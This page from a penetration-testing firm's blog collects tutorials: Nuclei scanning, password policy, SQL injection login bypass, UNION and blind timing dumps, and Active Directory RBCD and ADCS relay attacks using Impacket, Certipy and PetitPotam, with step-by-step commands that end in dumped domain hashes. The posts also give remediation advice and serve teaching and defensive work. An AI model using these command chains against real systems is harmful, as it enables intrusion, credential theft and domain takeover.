Category: Exploits

  • Cool Tools Series: Nuclei

    Cool Tools Series: Nuclei

    Hopefully you enjoyed Adam Fernandez’s recent Cool Tools post, Nmap For Penetration Tests. In this next post in the series, I’d like to introduce another great penetration testing tool: Nuclei.

    Nuclei is an outstanding enumeration tool that performs a myriad of checks against the systems and services it discovers. It does particularly well against web applications. It also tests for known vulnerabilities, can pull versioning information from systems, and can try default credentials.

    Installing Nuclei

    You can use apt to easily install it on Kali Linux:

    apt install nuclei
    

    Templates

    Nuclei uses saved templates to perform tests against systems. This lets users create new templates as new discoveries are made. You can also generate custom templates for tasks you often use or things you discover yourself.

    More information about these templates can be found here: https://docs.projectdiscovery.io/templates/introduction

    You can explore the templates Nuclei uses by default here.

    https://github.com/projectdiscovery/nuclei-templates/tree/main

    Options

    There are a lot of different options when using the tool, but generally, when I’m using it for external network and web application tests, I just pass a target or a list of targets to the program.

    To get a full list of options, all you need to do is this command:

    nuclei –help

    To scan a single device, simply use:

    nuclei -u {Target}

    Here is an example from a recent penetration test. There was only one target, so I simply passed that target to Nuclei:

    Nuclei with one target

    You can see that Nuclei examined the responses from the web server and found that security-related headers were missing.

    Here is an example using Nuclei against a list of targets. I put the targets for the engagement into a file called targets & ran the following command:

    nuclei -list {File}
    Nuclei with a list of targets

    Real-World Nuclei Discoveries

    Here are some examples of useful things Nuclei has found for me during various penetration tests.

    Here Nuclei found a Solr panel, revealed the version running, and shared it in a human-readable format easy for me to use as a pentester:

    Nuclei discovering Solr panel and displaying discovered information.

    Here Nuclei did some testing against a host on an internal network and successfully performed a Log4j exploit. It then reported the success with a critical flag as this could lead to remote code execution (RCE):

    Nuclei successfully performing Log4j exploit.

    I’ve also found Nuclei’s ability to try default passwords to come in handy when testing.

    As an example, I use a self-hosted Git instance and changed the root account’s password to one that Nuclei uses. You can see how Nuclei successfully logged into the GitLab and notified me:

    Nuclei discovering a default password.

    Thanks for Reading

    There’s a lot more to Nuclei, but this is a good start. Thanks for taking a look at this post, and I hope you’ll be back for future Cool Tools posts in the series.

  • Password Length: More than Just a Question of Compliance

    Password length is a topic we’re asked about a lot, and that makes sense because it can be quite confusing. There are several different compliance models that organizations use – from PCI to NIST to OWASP and more. Each has its own standards for password strength and password length.

    When it comes to penetration testing, weak password recommendations often are more rigorous than compliance standards, and this leads to a great deal of stress, especially for organizations that have already spent time and effort in implementing password rules that meet the compliance standards they’ve chosen.

    Why So Many Different Standards?

    First, speaking from experience, penetration testers see firsthand how weak and reused passwords are often a key part of achieving access over an entire domain (i.e. having administrative powers to view, add, edit, and delete users, files, and sensitive data, including passwords, for an organization’s Active Directory environment). While this is the type of success that pentesters strive to achieve, the true goal of a penetration test is to show organizations weaknesses so that they can close exploitation paths before malicious attackers find them.

    For this reason, Raxis penetration tests recommend passwords of at least 12-16 characters for users and at least 20 characters for service accounts. Of course, we recommend more than length (see below for some tips), but Raxis password cracking servers have cracked weak passwords in minutes or even seconds on internal network penetration tests and red team tests several times this year already. We don’t want our customers to experience that outside of a pentest.

    Post-It Notes With Passwords on a Monitor

    On the other hand, compliance frameworks are just that – frameworks. While their aim is to guide organizations to be secure, they do not endeavor to force organizations out of compliance with a stringent set of rules that may not be necessary for all systems and applications. For example, a banking website should require stronger credentials and login rules than a store website that simply allows customers to keep track of the plants they’ve bought without storing financial or personal information.

    If you read the small print, compliance frameworks nearly always recommend passwords longer than they require. It’s unlikely, though, that many people read the recommendations when working on a long compliance checklist when they have several more items to complete.

    Times are Changing

    Of course, time goes on, and even compliance frameworks usually recommend at least ten-character passwords now. The PCI (Payment Card Industry) standards that are required for organizations that process credit cards now require 12 character passwords unless the system cannot accept more than eight characters. PCI DSS v4.0 requirement 8.3.6 does have some exceptions including still allowing PCI DSS v3.2.1’s seven-character minimum length that is grandfathered in until the end of March 2025.

    This is a good example of PCI giving companies time to change. It’s been well known for years that someone who has taken the time and expertise to build a powerful password-cracking system can crack a seven-character password hash in minutes. This leaves any organization that still allows seven-character passwords with a strong threat of accounts becoming compromised if the hash is leaked.

    OWASP (the Open Web Application Security Project), which provides authoritative guidance for web and mobile application security practices, accepts 10 characters as the recommended minimum in their Authentication Cheat Sheet. OWASP states that they base this on the NIST SP 800-132 standard, which was published in 2010 and is currently in the process of being revised by NIST. Keep in mind that OWASP also recommends that the maximum password length not be set to low, and they recommend 128 characters as the max.

    The Center for Internet Security, on the other hand, has added MFA to their password length requirements. In their CIS Password Policy Guide published in 2021, CIS requires 14 character passwords for password-only accounts and eight character passwords for accounts that require MFA.

    Other Factors

    This brings up a good point. There is more to a strong password than just length.  

    Digital screen showing a key

    MFA (multi-factor authentication) allows a second layer of protection such as a smartphone app or a hardware token. Someone discovered or cracked your password? Well, they have one more step before they have access. Keep in mind that some apps allow bypassing MFA for a time on trusted machines (which leaves you vulnerable if a malicious insider is at work or if someone found a way into your offices).

    Also keep in mind that busy people sometimes accept alerts on their phones without reading them carefully. For this reason, Raxis has a service – MFA Phishy – that sends MFA requests to employees and alerts them (and reports to management) if they accept the false MFA requests.

    MFA is a great security tool, but it still relies on the user to be vigilant.

    Raxis’ Recommendations

    In the end, there are a myriad of ways that hackers can gain access to accounts. Raxis recommends setting the highest security possible for each layer of controls in order to encourage attackers to move on to an easier target.

    We recommend the following rules for passwords along with requiring MFA for all accounts that access sensitive data or services:

    1. Require a 12-character minimum password length.
    2. Include uppercase and lowercase letters as well as numbers and at least once special character. Extra points for the number and special character being anywhere but the beginning or end of the password!
    3. Do not include common mnemonic phrases such as 1234567890, abcdefghijkl, your company name, or other easily guessable words. Don’t be on NordPass’s list!
    4. Do not reuse passwords across accounts, which could allow a hacker who gains access to one password to gain access to multiple accounts.

    There are two easy ways to follow these rules without causing yourself a major headache:

    1. Use a password manager (such as NordPass above, BitWarden, Keeper, or 1Password amongst others). Nowadays these tools integrate for all of your devices and browsers, so you can truly remember one (very long and complex) password in order to easily access all of your passwords
      • These tools often provide password generators that quickly create & save random passwords for your accounts.
      • They usually use Face ID and fingerprint technology to make using them even easier.
      • And they also allow MFA, which we recommend using to keep your accounts secure.
    2. Use passphrases. Phrases allow you to easily remember long passwords while making them difficult for an attacker to crack or guess. Just be sure to use phrases that YOU will remember but others won’t guess.

    And I’ll leave you with one last recommendation. On Raxis penetration tests, our team often provides a list of the most common passwords we cracked during the engagement in our report to the customer. Don’t be the person with Ihatethiscompany! or Ihatemyb0ss as your password!

  • SQLi Series: SQL Timing Attacks

    In the previous post we built a web page and connected it to a SQL server in order to test and learn about SQL injection. In the previous application the website returned data to the web page making it easy to gather information from the database as the info was printed out.

    What happens if the web application does not print the data from the SQL query. Well, there are still ways to gather data. SQLi attacks where the results are not displayed are referred to as Blind SQL Injection. Of course, this makes the attack more difficult, but these are by far the most common SQLi vulnerabilities, and attackers don’t stop just because they take extra effort.

    One such way is using timing. MySQL servers have a Sleep function which causes the server to sleep for the specified number of seconds. You can use this in conjunction with comparatives allowing the dumping of the database.

    A Refresher

    We’re using basically the same application as last time, except that this time the application only returns success or failure depending on whether the username and password entered are correct or not. As a side note, a success fail message can be used much the same way, but this blog will discuss timing.

    This is the response when the username and password entered were correct:

    A success when the username and password are correct

    And this is the response when the username and password did not match:

    A failure when the password is incorrect

    Now we can login as we did last time by closing the SQL quote and commenting out the rest of the query, but we’ve already gone over that in the first blog in this series. So let’s explore dumping information from the database instead.

    Success when the password is incorrect using a SQLi attack

    Useful SQL Functions & Clauses

    In order to pull information from the database we will use a number of MySQL commands and features.

    SLEEP() Function

    The SLEEP function will cause the server to wait for the specified number of seconds before returning the information.

    Example from the command line:

    The SLEEP function

    As we can see the query takes five seconds to complete.

    SUBSTRING() Function

    We will need a way to test one character at a time, so we need a way to get one character from the returned info so we can compare it. For this we use SUBSTRING():

    SUBSTRING(String, Position, Length)
    The SUBSTRING function

    IF() Statement

    This is how we branch in MySQL.

    IF(Condition, Value if true, Value if false)
    An IF statement

    For the Value if true and Value if false we can do more than just add return values. For instance, we can put the SLEEP function right in the IF function.

    Using the SLEEP function in an IF statement

    We can see that, when the condition was true, the server waited for five seconds.

    COUNT() Function

    There will be times when we need to know how many of a thing we have. For instance, we might need to know how many columns are in a table or how many rows.

    Now, in the database I’m using for testing, I know that there are three columns in the users table.

    Here is an example using COUNT showing that.

    The COUNT function

    DATABASE() Function

    We can get the current database in use by calling the DATABASE() function:

    The DATABASE function

    Querying Database Schemas

    If, for some reason, you need to pull the databases manually, maybe because one isn’t set or you want to see what else is out there, you can use this query:

    SELECT table_schema FROM information_schema.tables WHERE table_schema NOT IN ( 'information_schema', 'performance_schema', 'mysql', 'sys' ) GROUP BY table_schema;
    Querying the database schema

    We should note that default databases are removed by the NOT IN() phrase.

    Getting Tables

    We can query the information_schema database to get tables in a database:

    SELECT table_name from INFORMATION_SCHEMA.tables WHERE table_schema='DATABASE';
    
    Getting tables using the information_schema

    Getting Columns

    We can also query the information_schema database to get the column names in a table:

    SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='DATABASE' and TABLE_NAME='TABLE_NAME';
    
    Getting columns using the information_schema

    Comparative Queries with the LIKE & BINARY Functions

    = does not always mean equal. With the equal sign we can see how a capital A and a lowercase a are equal. Which is not true in a case sensitive language.

    An IF statement showing that the equal sign doesn't always mean "equals"

    To get around this we can use LIKE BINARY to compare. Here we find that a capital A and a lowercase a are not the same:

    Using LIKE BINARY to find strings that are exactly equal

    CAST() Function

    Sometimes when comparing things, it helps to cast items to a known type.

    Here is an example of casting 9 to a character:

    The CAST function

    LENGTH() Function

    When trying to figure out what a string is, it helps to get the length of the string:

    The LENGTH function

    LIMIT & OFFSET Clauses

    Given that we are using Blind SQL, we can really only test one thing at a time. This is where limiting the amount of returned data comes in handy with the LIMIT clause.

    The LIMIT clause

    We can step down the list using the OFFSET clause. Note that we increase the offset to one less than the count as that will be the last item.

    Using the OFFSET clause

    Bringing It All Together

    Now that we have all the tools we need, let’s put them together and pull info from the database.

    Basically, we will check character by character. First thing we would want to find is the database name. We should probably first figure out how long the database name is.

    Since we are using conditionals, it might be easier to use the username part of the query, that way we don’t need to have the right password.

    Closing off the SQL code after the username so that we don't need to know the password to perform our attacks

    First we see if the length is 1. It’s not, as the response comes back in less than five seconds.

    Discovering that the length is not 1

    Next we try 2, 3, and 4. We find out that 4 is correct, as the application takes longer than five seconds to respond.

    The Length is 4

    Now we need to figure out the letters in much the same way. Now we use the SUBSTRING function to test one letter at a time.

    Testing Letters for the Database Name

    To make things easier, I used Burp Intruder to send the letters automatically, instead of manually.

    We find that the letter S takes five seconds to respond. Now we know the first letter is S.

    Discovering that the first letter is "S" because there is a delay

    Next step is to test the second character.

    Testing the second character

    And we find that the second letter is Q.

    Finding that the second letter is "Q" using a timing attack

    Now, since I created the application, I know the database name is SQLi so let’s move on to getting table names.

    First we use some weird wizardry to discover the number of tables in the database, combining several of the functions we saw above:

    Getting the number of tables in the database

    Here we are getting the count of tables in the SQLi database. We find that there is only one table.

    Now let’s get the table name.

    Let’s start with getting the length of the table name.

    Getting the Length of the Table Name

    We find that the length of the name is five. With the length we can start grabbing the chars.

    Here’s the query we will use.

    Getting the table name one character at a time

    Basically, we are asking for all the table names for tables in the SQLi database. We grab the first one and then use substring to test one character at a time.

    Using Burp Intruder we find the first character is u. Repeating we find that the table name is users.

    Using Burp Intruder to find the character "u" with a timing delay

    Note:

    When retrieving names with this method, knowing the length is not truly required. When trying to compare to additional characters – say position six in the table name – it will always return false, meaning that the delay will never occur. If all the possible results stay under the delay, we know that we have the entire string. I like the idea of using the length to make sure I don’t miss something, but it’s not absolutely necessary.

    Now that we have the table name, it’s time to start getting data from the table itself. First, we need to know how many columns there are in the table.

    Finding There are 3 Columns

    When using the COUNT function to learn the number of columns, we find that there are three, as that’s when the sever takes more than five seconds to respond. With the number of columns in hand, let’s get those column names.

    This is similar to getting the table name but just querying different information.

    Here we get the length of the first column name:

    Finding Length of First Column Name

    And next the column name itself.

    Getting the Column Name

    Since we are getting information in the same way, this is very repetitive, so I’m going to assume you get the idea and go through this quickly.

    As an example, I’ll show how to get the second column’s information, which just means adding an OFFSET to the limit:

    Getting Length of Second Column

    Here we get the first letter of the second column:

    Testing Name of Second Column

    The second column is password, so, as expected, we find that the first letter is p.

    With all the table information, now we just need to start grabbing the data from the table. We can start by seeing how much data is in a table.

    Since this is a small test database, there isn’t a lot of data, so we can count the number of items and compare it to numbers we retrieve easily. On larger sets you may have to be more careful or smarter in gathering info. But this is a basic writeup giving the ideas, and I’ll leave that as an exercise to the readers.

    With this database, we find that there are only three records in the table:

    Getting Amount of Data in Table

    Now let’s get the first username from the table:

    Getting the Username

    And finally, we get their password:

    Getting the Password

    In Conclusion

    Timing attacks, as with all Blind SQLi, take a good deal of time and patience, but the rewards can be discovering credentials to login to the database or sensitive customer information like PII (Personally Identifiable Information) and financial data, like credit card numbers.

    As with all injection attacks, the remediation is to always validate user input. Raxis recommends keeping a list of whitelisted characters and deleting other characters before they process against the database. Cleansing data to be certain that user input is always treated as text (and not run as a command) is also key to this process.

    Understanding how to perform attacks like these are critical for web and mobile application penetration testers, just as understanding the idea of how they work is key for application developers so that they can build safeguards into their apps to protect their data and their users.

  • SQLi Series: An Introduction to SQL Injection

    Web applications often need to store data to better serve their customers. An example would be storing customer login information or comments submitted by users on the webpage. There are many ways of storing data for customers, but a popular way is to store the information in a SQL database.

    A common and basic use of web applications and SQL databases is to handle user login information and functionality. In many web applications a user submits a username and password into a form. The web application takes the submitted data and searches the database to determine if it’s a valid credential set. If it is, then the web application will log the user in.

    SQL Injection

    If the web application does not properly handle user input, an attacker might be able to create malicious input that changes the SQL query that performs that login task behind the scenes. Such SQL injection attacks take a lot of manual effort to discover and exploit, but they are a critical part of the web application penetration tests that we perform at Raxis.

    This blog explains how an attacker could find and exploit a SQL injection, or SQLi, vulnerability.

    Creating an Exploitable Login Webpage

    Let’s build a simple web application that asks for a username and password and returns the user’s ID. In order to help show the SQL injection attack, the application will also show the query used and the input from the login page. The SQL code the application uses (with user input parameters filled in) can be seen at the bottom of each screenshot.

    First let’s take a look at the results for the admin logging in normally.

    Successful login showing SQL query

    We can see that the user entered the admin username and password. We also see that our sample PHP web application uses a query where the username and password must match for success. If both match then, for our testing purposes, it returns the user ID which is printed out at the bottom.

    Here the admin’s account has the ID of 1.

    In the next example, the admin username is entered correctly, but the wrong password is supplied.

    Unsuccessful login showing the SQL query

    Again we can see the information that was input into the application and the query. However, since the password does not match the one in the database, we don’t get the user ID.

    Exploiting the Webpage to Login

    In the example queries above we saw that the username and password input was passed into the query without modification.

    So what happens if we close the single quote around the username?

    Attempted SQL injection with a single quote

    We see that, even though the correct password was entered, the single quote at the end of the username prevents the query from returning a correct result. In this case we get the same error message as if the username and password were incorrect, but other web applications might crash in different ways indicating there was a backend issue.

    In MySQL the # symbol denotes a comment, which makes the database ignore everything after it. Let’s try adding a # after that single quote we just added:

    Successful SQL injection bypassing the password

    Now we see that, even though we submitted the wrong password, the application considers the SQL query successful and returns the correct user ID. The question is What is happening here?

    Let’s take a closer look at the query and the input from the user.

    The input in the username field has injected two special SQL characters: the (single quote) and the #.

    This changes the query itself because the user input is directly inserted into the query.

    Highlighting that the MySQL # comment symbol allowed the SQL injection to work

    The single quote closes the username entry so that the text that comes after is read as part of the SQL query. This means that the # is interpreted as the comment symbol, meaning that the rest of the query is simply ignored.

    Basically, that means that the query is now just running as

    SELECT id, username, password FROM users WHERE username=’admin’

    Since the admin user exists, we get the successful result of the user id of 1, even with the wrong password.

    This also means that we can login as any user, provided that we know their username. Just change the admin username to the desired username.

    Using the same injection string to login as another user

    Exploiting the Webpage to Get Data

    Now logging in as any user is fun and all, but what else can we do? Well, we can come up with SQL queries that dump information from the database.

    Let’s use the UNION operator to inject another SQL query that goes along with the query created by the application. We should note that, since the sample web application only shows one column at a time, we need to switch what we are asking for first so that the application will show us more information.

    Here is what happens when we add a UNION SELECT for all the user IDs from the users table to the SQL injection we are entering in the username field:

    SQL injection adding UNION SELECT to get a list of all user IDs.

    After asking for the IDs, we enter a new SQL injection and ask for the usernames:

    SQL injection adding UNION SELECT to get a list of all usernames.

    And finally, we perform a SQL injection requesting the passwords:

    SQL injection adding UNION SELECT to get a list of all passwords.

    A Quick Note on Password Hashes

    This is a good time to note why using password hashes (instead of saving passwords in plaintext) is a good idea. If password hashes were in use, an attacker would have to crack the passwords in order for them to be useful in a SQL injection attack.

    Automated Exploitation with SQLMap

    While we can do attacks such as these manually, sometimes, after identifying a vulnerability, it is easier to use tools to exploit it for you. In real life scenarios, SQLi attacks don’t return the SQL statement, and it takes some trial and error to discover how the application is reacting to our input.

    My go-to tool for SQL injection attacks once I find a sign of them is always SQLMap. Here is a screenshot of SQLMap dumping the users table from the SQLi database the web application above uses.

    The SQLMap tool performing the same exploit we did manually

    SQLMap makes it a lot easier to dump information from a database when an application is susceptible to SQLi attacks. While here it dumped the same information we just did, it is capable of finding every table and column and dumping everything.

    More Than SQLi

    We should also note there are other ways of getting information from a database, including timing attacks in which a database waits to respond if something is true while responding quickly if it’s not. Timing attacks allow us to guess what input is valid and what is not valid. Maybe we will take a look at a timing attack example in another post.

    In Conclusion

    Now that we have a basic understanding of what SQL injection is and the types of exploits that can be done with it, my next posts in this series will go into specific attacks and how to perform them.

    As always, remember that these tutorials are guides for penetration testers and people looking to understand their penetration test results better. Attempting these attacks on any sites that don’t belong to you or where you don’t have legal documentation granting you access to perform ethical penetration testing is illegal and punishable under law.

  • AD Series: Resource Based Constrained Delegation (RBCD)

    In a Windows domain, devices have an msDS-AllowedToActOnBehalfOfOtherIdentitity attribute. Per Microsoft, “this attribute is used for access checks to determine if a requestor has permission to act on the behalf of other identities to services running as this account.” In this blog, we will exploit this feature to gain administrative access to a target system in a Resource Based Constrained Delegation (RBCD) attack.

    We’ll be using the Active Directory testing environment we setup in the first post in this series.

    Tools We’ll Be Using

    • NoPAC Scanner
    • Impacket Tools (installed on Kali):
      • addcomputer.py
      • rbcd.py
      • getST.py
      • secretsdump.py
      • psexec.py
    • Certipy

    The Basics of the RBCD Exploit

    First we need to have control of an account with an SPN (Service Principal Name). The easiest way to do this for our test is to create a machine account. By default any non-admin user can create up to 10 machine accounts, but this value is set by the MachineAccountQuota. You can query this info by using NoPAC scanner.

    python3 scanner.py Domain/User -dc-ip DC-IP
    
    Using NoPAC scanner to discover the MachineAccountQuota

    Seeing the MachineAccountQuota above 0 (again default is 10), any user can create a machine account. I used impacket’s addcomputer.py script.

    addcomputer.py ‘domain/user:Password’ -dc-ip DC-IP
    
    Using impacket’s addcomputer script to create a new machine account

    For initial testing I gave the special.user user the write privilege over the lab1 machine.

    The write privilege is all that is needed to modify the msDS-AllowedToActOnBehalfOfOtherIdentitity attribute.

    Adding the write privilege in order to modify the msDS-AllowedToActOnBehalfOfOtherIdentitity attribute

    After giving the write privilege to the account, I used rbcd.py script from impacket to modify the attribute and add the created computer account.

    rbcd.py -delegate-from ‘Controlled Account’ -delegate-to ‘target’ -dc-ip DC-IP -action write ‘Domain/User:Password’
    Using the rbcd.py script to modify the attribute and add the created computer account.

    After configuring the attribute, I used impacket’s getST.py script to get a Kerberos ticket where we impersonate the administrator user on that device. In this case make sure to use the created machine account to login.

    getST.py -spn ‘cifs/target’ -impersonate Target-Account -dc-ip DC-IP ‘Domain/User:Password’
    Using impacket’s getST.py script to get a Kerberos ticket where special.user impersonates the administrator user for that device

    In order to use the ticket, first I exported an environment variable that points to the created ticked.

    export KRB5CCNAME={Ticket}
    
    Exporting an environment variable that points to the created ticked

    Now that I have the ticket, I can use it with a bunch of tools. I used secretsdump as an example.

    secretsdump.py administrator@Target -k -dc-ip DC-IP -target-ip Target-IP
    
    Using secretsdump to dump local SAM hashes using the exported ticket

    Note: When using the tickets, make sure the target isn’t an IP address but rather the domain name (i.e. lab1.ad.lab). You can use the target-ip flag to point to the right computer if names don’t resolve. I don’t want to admit how long it took me to figure that out.

    Playing around with RBCD

    Certipy has the ability to access an LDAP shell with a PFX certificate. Say there is web enrollment enabled. As we discussed in the past, you can force the server to authenticate to you then relay it to web enrollment.

    certipy relay -ca CA-IP
    Using certipy to force the server to authenticate to you then relay it to web enrollment

    After a successful relay you can use the saved certificate to access the LDAP shell.

    certipy auth -pfx Saved-Cert -ldap-shell -dc-ip DC-IP
    Accessing the LDAP shell with PFX certificate

    Once in the LDAP shell you can set up the RBCD attack with the set_rbcd command where the first argument is the target device and the second is the controlled account.

    set_rbcd Target Controlled-Account
    Using set_rbcd to set the target as a controlled account

    After setting up the RBCD, it’s the same as before using getST to get the ticket and run with it.

    impacket-getST -spn cifs/target -impersonate Target-Account -dc-ip DC-IP ‘Domain/User:Password’
    Using getST.py to get the ticket as before
    impacket-psexec 'Domain/administrator@Target' -k -no-pass -dc-ip DC-IP -target-ip Target-IP
    Using impacket's psexec to gain access to an admin share

    Next I wanted to try the same thing but against the domain controller. So I setup certipy to get a domain controller certificate, as we’ve previously discussed.

    As a note, because it’s a domain controller, the template has to be specified as DomainController, but you can still use it to access an LDAP shell.

    certipy relay -ca CA-IP -template DomainController
    Using certipy to force the server to authenticate to you then relay it to web enrollment, this time using the domain controller template

    Then, as before, I accessed the LDAP shell and set up the RBCD attack.

    certipy auth -pfx Saved-Cert -ldap-shell -dc-ip DC-IP
    Accessing the LDAP shell with PFX certificate again
    set_rbcd Target Controlled-Account
    Using set_rbcd to set the target as a controlled account, this time for a domain controller

    Then it’s just the same thing as the other tests.

    impacket-getST -spn cifs/target -impersonate Target-Account -dc-ip DC-IP ‘Domain/User:Password’
    Using getST.py to get the ticket as before
    impacket-psexec 'Domain/administrator@Target' -dc-ip DC-IP -target-ip Target-IP -k -no-pass
    Using impacket's psexec to gain access to an admin share

    Protecting Against RBCD

    I made a new user, protected.user, to show how to add protections within Active Directory to prevent these attacks. Here I successfully exploit RBCD before adding protections.

    Using getST.py to get the ticket before we've added protections, and it still works like before

    As expected, it worked.

    Now I checked the box that prevents the account from being delegated.

    Checking the "Account is sensitive and cannot be delegated" box in protected.user's settings

    And then I tried again.

    Using getST.py in an attempt to get the ticket after we've added protections, and now it no longer works

    This time the attack didn’t work, which is what we were looking for.

    Microsoft also has a group called Protected Users which should (based on my understanding) enable protections against this and other attacks. While I’ve been blocked before by that group while performing penetration tests, for some reason, in my lab, adding a user to that group did not actually prevent the attack. I’m not sure why, but it didn’t, hence the method I discovered above to be sure the account is protected.

    A Final Note

    The end result for RBCD really is just getting administrative access to a machine. It’s a privilege escalation exploit, and it only works on the machine you’re targeting, not across the domain. If you’re on a DC then great. But it’s still a great way for someone to get admin access to a machine in order to try lateral movement or to access info on that machine during a penetration test.

    Want to learn more? Take a look at the first in this Active Directory Series.

  • An Inside Look at a Raxis Red Team

    Raxis’ Cybersecurity Red Team Test is our top tier test that gives our customers a true feel of what hackers could and would do to their systems, networks, employees, and even offices and storefront locations.

    Curious to know more? Take a look at this short video that gives a true look at real Raxis red team tests.

    While that looks like fun and games, it’s actually serious business. Red team tests are slow and methodical, making sure not to trip any alarms or cause wariness… until the first crack in the armor appears and then things often move quickly from there.

    Hackers look for the low hanging fruit. Whether that is a friendly employee who lets them in, a badge reader system that is vulnerable to simple attacks, or an unsecured wireless network reachable from the parking lot, it’s likely only the first step. Once the Raxis team has some sort of access, we move quickly to establish long term access and to gain deeper access.

    While network and application penetration tests check your security controls and make sure that you are protecting each system to the fullest extend and following best security business practices, a red team widens the scope and looks at any way – often the easiest way – to get in. The scope of a red team widens to cover all or most of your systems, just as a malicious hacker would.

    Take a look at your cybersecurity controls, and, when you’re ready to take your testing to the next level, reach out to schedule a Raxis Cybersecurity Red Team Test.

  • AD Series: Active Directory Certificate Services (ADCS) Exploits Using NTLMRelayx.py

    I recently updated the last installment in my AD series – Active Directory Certificate Services (ADCS) Misconfiguration Exploits – with a few new tricks I discovered recently on an engagement. I mentioned that I have seen web enrollment where it does not listen on port 80 (HTTP), which is the default for certipy. I ran into some weird issues with certipy when testing on port 443, and I found that NTLMRelayx.py worked better in that case. As promised, here is a short blog explaining what I did.

    This is basically the same thing as using certipy – just a different set of commands. So here we will go through an example and see how it works.

    First we setup the relay.

    impacket-ntlmrelayx -t {Target} --adcs --template {Template Name} -smb2support
    Impacket command and results.

    The first part of the command points to the target. Make sure to include the endpoint (/certsrv/certfnsh.asp) as NTLMRelay won’t know that on its own. Also make sure to tell NTLMRelay if the host is HTTP or HTTPS.

    The adcs flag tells NTLMRelay that we are attacking ADCS, and the template flag is used to specify the template. This is needed if you are relaying a domain controller or want to target a specific template. However, if you are planning on just relaying machines or users, you can actually leave this part out.

    As connections come in, NTLMRelay will figure out on its own whether it’s a user or machine account and request the proper certificate. It does this based on whether the incoming username ends in a dollar sign. If it ends in a dollar sign NTLMRelay requests a machine certificate, if not it requests a user certificate.

    Once NTLMRelay gets a successful relay, it will return a large Base64 blob of data. This is a Base64 encoded certificate.

    Base64 certificate.

    You can take this Base64 blob and save it to a file. Then just decode the Base64 and save that as a PFX certificate file. After that the attack is the same as the certipy attack in my previous blog. Just use the certificate to login.

    Saving, decoding, and using the Base64 certificate to login.

    Want to learn more? Take a look at the next part of our Active Directory Series.

  • AD Series: Active Directory Certificate Services (ADCS) Misconfiguration Exploits

    Note: This blog was last updated 1/23/2024. Updates are noted by date below.

    Active Directory Certificate Services (ADCS) is a server role that allows a corporation to build a public key infrastructure. This allows the organization to provide public key cryptography, digital certificates and digital signatures capabilities to the internal domain.

    While using ADCS can provide a company with valuable capabilities on their network, a misconfigured ADCS server could allow an attacker to gain additional unauthorized access to the domain. This blog outlines exploitation techniques for vulnerable ADCS misconfigurations that we see in the field.

    Tools We’ll Be Using
    • Certipy: A great tool for exploiting several ADCS misconfigurations.
    • PetitPotam: A tool that coerces Windows hosts to authenticate to other machines.
    • Secretsdump (a python script included in Impacket): A tool that dumps SAM and LSA secrets using methods such as pass-the-hash. It can also be used to dump the all the password hashes for the domain from the domain controller.
    • CrackMapExec: A multi-fasceted tool that, among other things, can dump user credentials while spraying credentials across the network to access more systems.
    • A test Active Directory environment like the one we provisioned in the first blog in this series.
    Exploit 1: ADCS Web Enrollment

    If an ADCS certificate authority has web enrollment enabled, an attacker can perform a relay attack against the Certificate Authority, possibly escalating privileges within the domain. We can use Certipy to find ADCS Certificate Authority servers by using the tool’s find command. Note that the attacker would need access to the domain, but the credentials of a simple authenticated user is all that is needed to perform the attack.

    certipy find -dc-ip {DC IP Address} -u {User} -p {Password}
    Using Certipy to find an ADCS Certificate Authority Server

    First, while setting up ADCS in my test environment, I setup a Certificate Authority to use for this testing.

    Certipy’s find command also has a vulnerable flag that will only show misconfigurations within ADCS.

    certipy find -dc-ip {DC IP Address} -u {Username} -p {Password} -vulnerable
    Using Certipy’s Vulnerable flag

    The text file output lists misconfigurations found by Certipy. While setting up my lab environment I checked the box for web enrollment. Here we see that the default configuration is vulnerable to the ESC8 attack:

    Web Enrollment Vulnerability

    To exploit this vulnerability, we can use Certipy to relay incoming connections to the CA server. Upon a successful relay we will gain access to a certificate for the relayed machine or the user account. But what really makes this a powerful attack is that we can relay the domain controller machine account, effectively giving us complete access to the domain. Using PetitPotam we can continue the attack and easily force the domain controller to authenticate to us.

    The first step is to setup Certipy to relay the incoming connections to the vulnerable certificate authority.  Since we are planning on relaying a domain controller’s connection, we need to specify the domain controller template.

    certipy relay -ca {Certificate Authority IP Address} -template DomainController
    Using Certipy to Relay Incoming Connections

    Update 1/11/2024: While on an engagement I found that the organization had changed the default certificate templates. They had switched out the DomainController template with another one. So while I could successfully force a Domain Controller to authenticate, I would receive an error when trying to get a DomainController certificate. After a longer time than I care to admit, I used certipy to check the enabled templates and found that DomainController was not one of them. All I had to do was change the template name to match their custom template name. TL;DR: Check the templates if there is an error getting a DomainController certificate.

    Now that Certipy is setup to relay connections, we use PetitPotam to coerce the domain controller into authenticating against our server.

    python3 PetitPotam.py -u {Username} -p {Password} {Listener IP Address} {Target IP Address}
    Using PetitPotam to force authentication

    After Certipy receives the connection it will relay the connection and get a certificate for the domain controller machine account.

    Successful relay attack

    We can then use Certipy to authenticate with the certificate, which gives access to the domain controller’s machine account hash.

    certipy auth -username {Username} -domain {Domain} -dc-ip {DC IP Adress} -pfx {Certificate}
    Getting Machine Hash

    We can then use this hash with Secretsdump from the impacket library to dump all the user hashes. We can also use the hash with other tools such as CrackMapExec (CME) and smbclient. Basically anything that allows us to login with a username and hash would work. Here we use Secretsdump.

    impacket-secretsdump {Domain/Username@IP Address} -hashes {Hash}
    Dumping the domain

    At this point we have complete access to the windows domain.

    Update 1/23/2024: I have seen web enrollment where it does not listen on port 80 over HTTP, which is the default for certipy. I tried to use certipy on an engagement where web enrollment was listening only over HTTPS, and I ran into some weird issues. I found that NTLMRelay seems to work better in that situation, so I’ve written a new post detailing that attack.

    Exploit 2: ESC3

    In order to test additional misconfigurations that Certipy will identify and exploit, I started adding new certificate templates to the domain. While configuring the new template, I checked the option for Supply in the request, which popped up a warning box about possible issues.

    Warning on new certificate

    Given that I want to exploit possible misconfigurations, I was happy to see it.

    Note: If you are testing in your own environment, once you create the template you will need to configure the CA to actually serve it.

    After creating and configuring the new certificate template, we use Certipy to enumerate vulnerable templates using the same command we used to start the previous attack. Certipy identified that the new template was vulnerable to ESC3 issue.

    certipy find -dc-ip {DC IP Address} -u {Username} -p {Password} -vulnerable
    Vulnerable template

    Exploiting this issue can allow an attacker to escalate privileges from those of a normal domain user to a domain administrator. The first step to gaining domain administrator privileges is to request a new certificate based on the vulnerable template. We will need access to the domain as a standard user.

    certipy req -dc-ip {DC IP Address} -u {Username} -p {Password} -target-ip {CA IP Address} -ca {CA Server Name} -template {Vulnerable Template Name}
    Getting new certificate

